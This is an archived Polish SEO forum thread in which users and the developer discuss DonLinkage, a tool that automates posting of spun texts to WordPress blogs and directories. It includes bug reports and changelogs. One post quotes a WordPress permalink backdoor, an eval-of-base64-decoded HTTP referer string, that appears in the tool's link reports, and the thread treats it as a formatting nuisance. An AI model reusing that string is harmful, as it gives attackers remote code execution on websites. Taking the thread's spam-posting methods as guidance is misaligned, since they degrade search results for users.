Skocz do zawartości

DonLinkage - najnowszy automat do pozycjonowania

okazwłoka

Rekomendowane odpowiedzi

• Odpowiedzi 6,2 tys.
  • Dodano
  • Ostatniej odpowiedzi

DLA obecnie dodaje 2x wpis do WP. ( przy 1 projekcie)

Generator tekstów ArtMasta nie działa w obecnym DLA.

Moja sugestia:

- przy tworzeniu projektu w artykułach dodać button generuj treści + dodaj synonimy

"Na szczycie zawsze znajdzie się miejsce" - Ale potrzebujesz serwera by tam się znaleźć - Zgarnij kod rabatowy do SEOhost 40% - lub rabat do Cyber_folks - 10% - Rabat do hitme -5% - #reklama #link_sponsorowany

Sprawdzam to, będzie przy aktualizacji mam nadzieję poprawione.

@cinmar - wyjaśnij jak chciałbys zeby te przyciski działały :)

Hmm tutaj myslalem wykorzystsać moduł który masz "Automatyczne generowanie tekstów z synonimami!", porpostu klikasz generuj tekst i generuje prosto do projektu bez kopiowania itd, z tym że ustawione sa jakieś limity, może by wykorzystal do tego ArtMasta?. W 1 sofcie byla taka opcja i bardzo dobrze to sie sprawdzało z tym że określane były limity na poszczególne typy formularzy w zależności do czego szedl tekst np do katalogow generował np max 250 znakow, tutaj można by otworzyć okno pomocnicze w określeniu ilości znaków, pomysl do przemyślenia.

"Na szczycie zawsze znajdzie się miejsce" - Ale potrzebujesz serwera by tam się znaleźć - Zgarnij kod rabatowy do SEOhost 40% - lub rabat do Cyber_folks - 10% - Rabat do hitme -5% - #reklama #link_sponsorowany

@ okazwłoka

1. Jeżeli ustawimy np. dodawanie harmonogramu do wordpressów, będziemy dodawać i później usuniemy to zadanie, to czy przy kolejnym ustawieniu dodawania zacznie dodawać od początku czy tam gdzie skończył ostatnio?

2. Czy jeżeli w polu: Ilość ustawię 0 to zadziała to tak jak w MAX, czyli bez ograniczeń?

3. Przy dodawaniu do wordpressów w niektórych linkach w raporcie na końcu mam doklejone:

/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Da radę nie doklejać tego kodu?

4. W czasie dodawania w harmonogramie mam podaną wartość W TRAKCIE id: x. Czy mógłbyś wprowadzić również statystykę ile dodało i ile jest wszystkich do dodania czyli np. jak mam 100 katalogów a dodaje aktualnie do 50 to by było 50/100 - wtedy będzie widać jaki jest progres. Podawanie ID nic nie wnosi bo zwykle są to wartości dużo wyższe niż ilość katalogów.

5. Przydałoby się aby w sofcie była jakąś zakładka FAQ i tam wyjaśnienie podstawowych pytań odnośnie softu, np. jakie crony trzeba ustawić, do czego służą i inne podstawowe pytania, które często się pojawiają.

Aktualizacja bazy się zbliża, bo ta jest mocno wyjechana (rozwiąże to między innymi problem z małą ilością dodań do wordpress - przyczyną jest właśnie słaba baza). Już w tym tygodniu będzie odświeżona baza.

@Cinmar - przygotuję coś takiego.

@Bestek:

ad1. Jeśli usuniesz zadanie, to po ponownym dodaniu będzie jechał od początku.

ad2. Nie podałem w nowym panelu tej informacji, dodam. Jeśli ilość masz 0, to zatrzymuje dodawanie.

ad3. Nie ma problemu - o ile wszędzie jest taki sam kod

ad4. Poprawię to.

ad5. W pliku instrukcje.txt i na stronie dlhelp.i4a.pl są podane informacje. Gdy tylko przywołam tę wersję do porządku (wyjdziemy z beta) to porobię filmiki instruktażowe z moim pięknym głosem ;)

Aktualizacja DonLinkage jeśli nie dziś, to już jutro. Od rana jadę z poprawkami. Chcę też w końcu zrobić te profile. To ile zdążę zrobić oczywiście zależy też od obciążenia mejlowego ;)

Właśnie została udostępniona aktualizacja 5.2.1 BETA (jeszcze beta, do końca września już wyjdziemy z bety i wszystko będzie mocno przetestowane).

DonLinkage 5.2.1 BETA:
8/09/2014
[x] poprawka donmini (obsługa prywatnych)
[x] poprawka edycji projektu
[x] poprawka rejestracji wordpress
[x] poprawione wyświetlanie w monitoringu pozycji
[x] poprawka wyświetlania tekstów z synonimizera
[x] dodane info do harmonogramu + poprawka harmonogramu
[x] naprawa edycji projektu (podgląd, pingowanie, podlinkowanie)
[x] poprawka czarnej listy
[x] poprawka opcji podlinkowania
[x] aktualizacja modułu artmasta

Jak ktoś chce może ją brać :D Dawno bana dostała i nie chce mi się z nią bawić. Forum też na razie nie czynne bo od roku nikt nic nie napisał :D

Dobra wiadomość, jeszcze przed południem będzie aktualizacja według propozycji @Cinmara:

Przy każdym polu tytułu i artykułu/opisu/komentarza będzie rozijane menu:

- Synonimizuj z synonim.i4a.pl

Opcja wysyła (automatycznie) wpisany tekst (wszystko w tle) do generatora synonim.i4a.pl, w odpowiedzi otrzymywany jest id tekstu. Po kilkudziesięciu sekundach (może być dłużej lub krócej w zależności od tego ile w danym momencie jest tekstów do przerobienia w synonim.i4a.pl) można kliknąć przycisk z id tekstu i gotowe :) Wpisany tekst zamienia się na tekst z synonimami z serwisu synonim.i4a.pl.

Teksty z synonim.i4a.pl wychodzą nawet zgrabnie, nadają się do katalogów, precli jak cza. A żeby były lepszej jakości wystarczy chwila poprawiania.

- Synonimizuj wewnętrznym modułem

Opcja ta automatycznie wysyła wpisany tekst (wszystko w tle) do wewnętrznego modułu "Synonimizer tekstów". Wpisany tekst zamienia się na tekst z synonimami z tego modułu!

- Wygeneruj tekst artmasta i synonimizuj wewnętrznym modułem

W tej opcji wystarczy w pole wpisać popularny tag związany z projektem i podać długość tekstu w słowach, a w odpowiedzi (wszystko w tle) otrzymasz tekst z artmasta.i4a.pl, który dodatkowo zostanie wrzucony do modułu "Synonimizer tekstów" (wszystko w tle). Podany tag zamienia się na tekst z synonimami!

Dostępna jest już aktualizacja o której pisałem wyżej:

DonLinkage 5.2.2 BETA:
9/09/2014
[x] możliwość generowania synonimów bezpośrednio w polach projektu
[x] do pól projektu podpięty synonim.i4a.pl
[x] do pól projektu podpięty wewnętrzny synonimizer tekstów
[x] do pól projektu podpięty artmasta.i4a.pl
[x] poprawa dodawania przez proxy

Każdy użytkownik donlinkage po kontakcie na mail otrzyma 10 000 punktów w systemie synonim.i4a.pl (oczywiście najpierw trzeba tam sam sobie założyć konto).

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Ostatnio przeglądający   0 użytkowników

• Brak zarejestrowanych użytkowników przeglądających tę stronę.

• Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności